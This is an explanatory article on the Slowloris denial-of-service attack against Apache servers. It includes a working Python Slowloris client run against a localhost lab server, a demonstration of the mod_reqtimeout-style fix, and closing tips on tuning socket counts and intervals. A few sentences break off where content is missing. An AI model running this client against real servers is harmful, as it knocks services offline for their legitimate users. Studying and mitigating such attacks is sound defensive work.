Usually, attackers take down a server by overwhelming it with traffic from a large number of machines (or compromised IoT devices, toasters included). Sometimes, though, the same goal can be achieved from a single computer. In this article I analyze my favorite denial-of-service attack, Slowloris, together with a Python implementation from GitHub. I found and tested two Python Slowloris scripts by the same author. The advanced one supports randomized User-Agent headers, proxies, SSL and other useful extras, but the simpler one illustrates the idea behind the attack more clearly and works just as well, so that is the one discussed here. It runs on any operating system that has Python.
This article is for academic and entertainment purposes only. Please don’t use it maliciously.
Theory
In a client-server HTTP exchange, the end of the request headers is marked by an empty line, i.e. two consecutive CRLF sequences. Until that blank line arrives, the server cannot treat the request as complete and keeps waiting for the rest of it. The idea behind Slowloris is to open as many concurrent HTTP requests as possible and keep every one of them alive indefinitely, at minimal cost to the attacker, so that the server's application-layer resources are exhausted: each unfinished request ties up one of the server's workers, and the pool of workers is finite.
Most servers, Apache included, use a timeout to terminate incomplete requests. Apache's Timeout directive defaulted to 300 seconds in older releases (Apache 2.4 lowered the default to 60 seconds), and the clock restarts every time the client sends more data. That is why the attacker does send data, but painfully slowly, hence the name.
Slowloris achieves DoS by opening many concurrent HTTP connections and sending a few bytes on each of them every 15 seconds, well inside the idle timeout. The interval should be tuned to the timeout of the specific target, but 15 seconds is often effective as-is against default configurations. Because the attacker transmits only a few bytes per connection every 15 seconds, a server can go down while the attacker's own connection stays almost idle.
Affected Servers
This attack mostly affects Apache web servers because Apache (with the prefork or worker MPM) dedicates a process or thread to each connection for as long as the connection lasts, and the number of such workers is bounded (MaxRequestWorkers, formerly MaxClients). Once every worker is tied up waiting for a half-sent request, new connections queue in the backlog and legitimate clients are not served. Whether the server has a bounded per-connection worker pool is the key factor that decides whether the attack succeeds, unless of course someone has implemented a mitigation such as a deadline on the header read (Apache's mod_reqtimeout); event-driven servers such as nginx are far less exposed.
At the time of writing, roughly half of all websites were hosted on Apache. Together with some other affected servers, that makes this a very useful attack for an attacker to have in the arsenal.
Apache web servers are also easy to locate with Google search operators, e.g.
Python Implementation
The program takes the target server's IP address or DNS name as a command-line argument. Here is what a run looks like (I set socket_count to 5 to avoid causing any trouble):
First, it opens a number of HTTP connections equal to socket_count (an integer set on line 20 of the script) and sends each one an incomplete request, never the blank line that would end the headers. Then it enters an infinite while loop that keeps those connections alive by sending a few bytes containing a random number (1 to 5000) on each socket every 15 seconds (set on line 58), which resets the server's timeout each time.
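The mechanism described above (a bounded pool of per-connection workers, an idle timeout that every trickled byte resets, and the client loop that exploits it) as an added lab example that runs entirely against a throwaway server on 127.0.0.1. This is my own code, not either of the GitHub scripts the article analyses; the server, its worker count of 4, the 0.2-second trickle interval and the 1-second header deadline are constructed values chosen to keep the demonstration short. The first scenario reproduces the starvation; the second shows the kind of fix Apache's mod_reqtimeout implements, a deadline on the whole header read rather than on idle time.

```python
import random
import socket
import threading
import time

# Added lab example, not the GitHub script discussed in the article.
# Server, slow client and legitimate client all run on 127.0.0.1 and are
# constructed for the demonstration; no real site is touched.

HALF_REQUEST = b"GET / HTTP/1.1\r\nHost: 127.0.0.1\r\nUser-Agent: lab\r\n"  # no blank line
FULL_REQUEST = b"GET / HTTP/1.1\r\nHost: 127.0.0.1\r\n\r\n"


def serve_one(conn, header_deadline):
    """Read one request's headers, then answer. Models a single Apache worker.

    header_deadline=None: an idle timeout that restarts on every byte received
    (the Slowloris-vulnerable behaviour). A number: total seconds allowed to
    finish the headers, like mod_reqtimeout's RequestReadTimeout, so that
    trickling bytes no longer extends the wait.
    """
    start = time.monotonic()
    buf = b""
    try:
        while b"\r\n\r\n" not in buf:
            if header_deadline is None:
                conn.settimeout(5.0)                  # idle timeout, reset on each recv
            else:
                left = header_deadline - (time.monotonic() - start)
                if left <= 0:
                    raise socket.timeout("header deadline exceeded")
                conn.settimeout(left)
            chunk = conn.recv(4096)
            if not chunk:
                return                                # client closed
            buf += chunk
        conn.sendall(b"HTTP/1.1 200 OK\r\nContent-Length: 2\r\nConnection: close\r\n\r\nok")
    except OSError:                                   # socket.timeout is an OSError
        try:
            conn.sendall(b"HTTP/1.1 408 Request Timeout\r\nContent-Length: 0\r\n\r\n")
        except OSError:
            pass
    finally:
        conn.close()


def start_server(workers, header_deadline):
    """Bounded worker pool: at most `workers` connections are served at once;
    the rest wait in the listen backlog (cf. Apache's MaxRequestWorkers)."""
    srv = socket.socket()
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))                        # ephemeral port
    srv.listen(64)
    slots = threading.BoundedSemaphore(workers)

    def handle(conn):
        try:
            serve_one(conn, header_deadline)
        finally:
            slots.release()

    def acceptor():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return                                # listening socket closed
            slots.acquire()                           # blocks while every worker is busy
            threading.Thread(target=handle, args=(conn,), daemon=True).start()

    threading.Thread(target=acceptor, daemon=True).start()
    return srv, srv.getsockname()[1]


def slowloris(port, socket_count, interval, stop):
    """Open socket_count half-sent requests and trickle a bogus header line
    into each one every `interval` seconds, as the analysed script does."""
    socks = []
    for _ in range(socket_count):
        s = socket.create_connection(("127.0.0.1", port))
        s.sendall(HALF_REQUEST)
        socks.append(s)
    while not stop.is_set():
        for s in socks:
            try:
                s.sendall(b"X-a: %d\r\n" % random.randint(1, 5000))
            except OSError:
                pass                                  # server dropped it; a real tool reconnects
        stop.wait(interval)
    for s in socks:
        s.close()


def legit_request(port, timeout):
    """One well-formed request; returns the status line, or None if it hangs."""
    try:
        with socket.create_connection(("127.0.0.1", port), timeout=timeout) as s:
            s.sendall(FULL_REQUEST)
            return s.recv(64).split(b"\r\n", 1)[0].decode()
    except OSError:
        return None


def run_scenario(header_deadline, workers=4, interval=0.2):
    """Tie up every worker with slow sockets, then check whether a normal
    client is still served. Returns that client's status line or None."""
    srv, port = start_server(workers, header_deadline)
    stop = threading.Event()
    attacker = threading.Thread(target=slowloris, args=(port, workers, interval, stop), daemon=True)
    attacker.start()
    time.sleep(0.5)                                   # let the slow sockets fill the pool
    result = legit_request(port, timeout=2.0)
    stop.set()
    attacker.join()
    srv.close()
    return result


if __name__ == "__main__":
    print("idle timeout only    :", run_scenario(header_deadline=None))  # None: starved
    print("header deadline 1.0 s:", run_scenario(header_deadline=1.0))   # HTTP/1.1 200 OK
```

With the idle timeout only, four slow sockets hold all four workers and the well-formed request never gets a worker, so it gives up after its two-second wait. With a one-second deadline on the header read, the slow sockets are answered 408 and closed at the one-second mark regardless of how often they trickle bytes, the slots free up, and the queued legitimate request is served. The same logic is why the interval the script sends on matters only against an idle timeout, and not at all against a total header-read deadline.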
Conclusion
I highly recommend testing your own websites (or ones you are explicitly authorised to test), because the test is so easy to run. If the site is vulnerable, a DoS takes a few minutes. If it is not, try increasing socket_count as far as your PC can handle, and don't forget to tune the interval to the target's timeout. The limiting factor is the number of connections the attacker can hold open relative to the server's worker limit rather than bandwidth, so some vulnerable sites may still need more than one machine.
Hopefully this attack will get more attention and more people will start protecting their servers. Luckily there are many tutorials that make securing against it straightforward: on Apache, mod_reqtimeout's RequestReadTimeout directive caps the total time a client may take to send its headers, however slowly it trickles them, and an event-driven reverse proxy such as nginx in front of Apache keeps idle connections from consuming a worker each.
TheBitcoinNews.com – Bitcoin News source since June 2011 –